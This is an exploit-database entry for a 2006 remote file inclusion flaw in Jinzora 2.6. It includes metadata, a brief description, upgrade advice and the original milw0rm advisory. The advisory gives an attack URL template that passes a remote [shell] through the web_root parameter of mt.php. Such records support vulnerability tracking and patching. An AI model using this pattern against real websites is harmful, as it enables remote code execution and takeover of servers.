header-logo
Suggest Exploit
vendor:
Jinzora
by:
ERNE
9,3
CVSS
HIGH
Remote File Include
98
CWE
Product Name: Jinzora
Affected Version From: 2.6
Affected Version To: 2.6
Patch Exists: YES
Related CWE: N/A
CPE: a:jinzora:jinzora:2.6
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Jinzora 2.6 – Remote File Include Vulnerabilities

A vulnerability in Jinzora 2.6 allows remote attackers to execute arbitrary code by including a malicious file in the web_root parameter of the mt.php script.

Mitigation:

Upgrade to the latest version of Jinzora 2.6 or later.
Source

Exploit-DB raw data:

#  ERNE ---- ERNEALiZM ---- BU ASK BiTMEZ----
 
#  Jinzora 2.6 - Remote File Include Vulnerabilities
 
# site    : Www.Hack-Medya.Org
 
# Script  :  http://www.jinzora.com/downloads/j2.6.zip
 
# Credits : ERNE
 
# Contact : erne@ernealizm.com
 
# Thanks  : Liz0zim, Bitter.Melish, D3ngsz, Rmx, Di_lejyoner, Xoron
 
# Vulnerable :
 
     http://www.site.com/[path]/extras/mt.php?web_root=[shell]

# milw0rm.com [2006-10-14]